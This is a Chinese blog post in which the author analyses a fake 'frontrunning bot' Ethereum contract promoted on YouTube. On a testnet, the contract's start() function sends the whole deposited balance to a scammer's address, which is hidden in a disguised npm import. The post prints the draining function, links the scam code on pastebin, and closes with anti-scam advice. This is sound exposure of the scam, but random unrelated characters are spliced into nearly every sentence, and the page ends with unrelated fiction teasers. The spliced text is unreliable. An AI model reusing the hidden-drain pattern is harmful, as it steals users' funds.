差點被騙了一個ETH

起因

前段時間在群里看到群友發(fā)了一個油管的鏈接芯勘,視頻內(nèi)容大致就是你只需按照他的代碼部署機器人的EVM合約即可躺賺收益腕唧,原理就是狙擊在Uniswap在某些大額交易變成“事實”之前搶先插隊在大額買入或賣出之前買入弦蹂,并且在大額買入或賣出成功后立馬賣出或買入完成套利铺根。

經(jīng)過

抱著懷疑態(tài)度胚股,看了下評論(當時覺得800多條評論庭再,不可能是假的吧),覺得臥槽牛逼芒珠,趕緊試一下桥狡。作者還為大家解惑,為什么免費分享代碼皱卓,是因為想建立自己在圈子的影響力总放,說得跟真的一樣。

image-20220909151715810.png

代碼很簡單好爬,https://pastebin.com/raw/vY4Y2c1y,就一個文件甥啄,用remix連接狐貍部署即可存炮,然后向合約轉(zhuǎn)錢,手動執(zhí)行合約的函數(shù)就可以開始賺錢,教程里說轉(zhuǎn)的eth越多賺的越多穆桂。

謹慎起見還是用測試網(wǎng)絡Ropsten試一下宫盔,測試不要錢,反正從水龍頭可以隨便拿錢(https://faucet.metamask.io/)享完。

image-20220909155136883.png
image-20220909155325236.png

部署完畢灼芭,合約放了兩個函數(shù)出來start就是開始開始賺取收益,withdraw就是把合約里的錢進行提現(xiàn) (看似邏輯非常完美)般又,因為合約也是你自己部署的彼绷,自己往合約上轉(zhuǎn)錢。

往合約轉(zhuǎn)1eth

image-20220911212148052.png

有了茴迁,點擊start寄悯!開始賺錢!

image-20220911212234722.png

下一刻堕义,錢沒了猜旬。看下內(nèi)部轉(zhuǎn)賬倦卖,調(diào)用start之后洒擦,合約內(nèi)部往下面這個地址轉(zhuǎn)了所有的錢。

image-20220911220225631.png

開始百思不得其解怕膛,因為在代碼全局里根本搜不到這個地址熟嫩。

回來看下start方法

function start() public payable {      

  /*
  * @dev Perform frontrun action from different contract pools
  * @param contract address to snipe liquidity from
  * @return `liquidity`.
  */

  payable(manager.DepositAddress()).transfer(address(this).balance);
}

這個manager.DepositAddress()很有誤導性,看起來是合約的管理者嘉竟,但manager這個類在代碼里找不到邦危。

花了很久很久,終于舍扰。倦蚪。。發(fā)現(xiàn)了一個可疑的引入

image-20220909183538413.png

npmjs.com一搜出來是這么個玩意边苹,死都想不到是這個cmc的npm出了問題陵且。真就還以為是cmc官網(wǎng)的api。真的太有迷惑性了个束。

image-20220909183814321.png

在非常隱蔽的地方找到了這個manager類慕购,其余代碼都已注釋

image-20220911220121870.png
image-20220911220029373.png
image-20220911220324332.png

最終在這里返回了騙子的地址。

總結(jié)

1.凡是說只要部署合約就能賺錢的大概率是騙子茬底,夾子機器是一個復雜的技術(shù), 僅有合約是不能夾到交易的, 因為合約不會自動運行, 必須要有腳本去調(diào)用合約沪悲,evm上的合約需要消費gas,都是有執(zhí)行生命周期的阱表,不可能一直存在那殿如。

2.小白部署合約前贡珊,即使看不懂solidty代碼,也應該在testnet進行測試涉馁,確保合約的安全性门岔。

3.世界上沒有不勞而獲的事情,不斷提高自己的認知是獲的前提烤送。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末寒随,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子帮坚,更是在濱河造成了極大的恐慌妻往,老刑警劉巖,帶你破解...
    沈念sama閱讀 210,914評論 6 490
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件叶沛,死亡現(xiàn)場離奇詭異蒲讯,居然都是意外死亡,警方通過查閱死者的電腦和手機灰署,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 89,935評論 2 383
  • 文/潘曉璐 我一進店門判帮,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人溉箕,你說我怎么就攤上這事晦墙。” “怎么了肴茄?”我有些...
    開封第一講書人閱讀 156,531評論 0 345
  • 文/不壞的土叔 我叫張陵晌畅,是天一觀的道長。 經(jīng)常有香客問我寡痰,道長抗楔,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 56,309評論 1 282
  • 正文 為了忘掉前任拦坠,我火速辦了婚禮连躏,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘贞滨。我一直安慰自己入热,他們只是感情好,可當我...
    茶點故事閱讀 65,381評論 5 384
  • 文/花漫 我一把揭開白布晓铆。 她就那樣靜靜地躺著勺良,像睡著了一般。 火紅的嫁衣襯著肌膚如雪骄噪。 梳的紋絲不亂的頭發(fā)上尚困,一...
    開封第一講書人閱讀 49,730評論 1 289
  • 那天,我揣著相機與錄音链蕊,去河邊找鬼尾组。 笑死忙芒,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的讳侨。 我是一名探鬼主播,決...
    沈念sama閱讀 38,882評論 3 404
  • 文/蒼蘭香墨 我猛地睜開眼奏属,長吁一口氣:“原來是場噩夢啊……” “哼跨跨!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起囱皿,我...
    開封第一講書人閱讀 37,643評論 0 266
  • 序言:老撾萬榮一對情侶失蹤勇婴,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后嘱腥,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體耕渴,經(jīng)...
    沈念sama閱讀 44,095評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,448評論 2 325
  • 正文 我和宋清朗相戀三年齿兔,在試婚紗的時候發(fā)現(xiàn)自己被綠了橱脸。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 38,566評論 1 339
  • 序言:一個原本活蹦亂跳的男人離奇死亡分苇,死狀恐怖添诉,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情医寿,我是刑警寧澤栏赴,帶...
    沈念sama閱讀 34,253評論 4 328
  • 正文 年R本政府宣布,位于F島的核電站靖秩,受9級特大地震影響须眷,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜沟突,卻給世界環(huán)境...
    茶點故事閱讀 39,829評論 3 312
  • 文/蒙蒙 一花颗、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧事扭,春花似錦捎稚、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,715評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至罐农,卻和暖如春条霜,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背涵亏。 一陣腳步聲響...
    開封第一講書人閱讀 31,945評論 1 264
  • 我被黑心中介騙來泰國打工宰睡, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留蒲凶,地道東北人。 一個月前我還...
    沈念sama閱讀 46,248評論 2 360
  • 正文 我出身青樓拆内,卻偏偏與公主長得像旋圆,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子麸恍,可洞房花燭夜當晚...
    茶點故事閱讀 43,440評論 2 348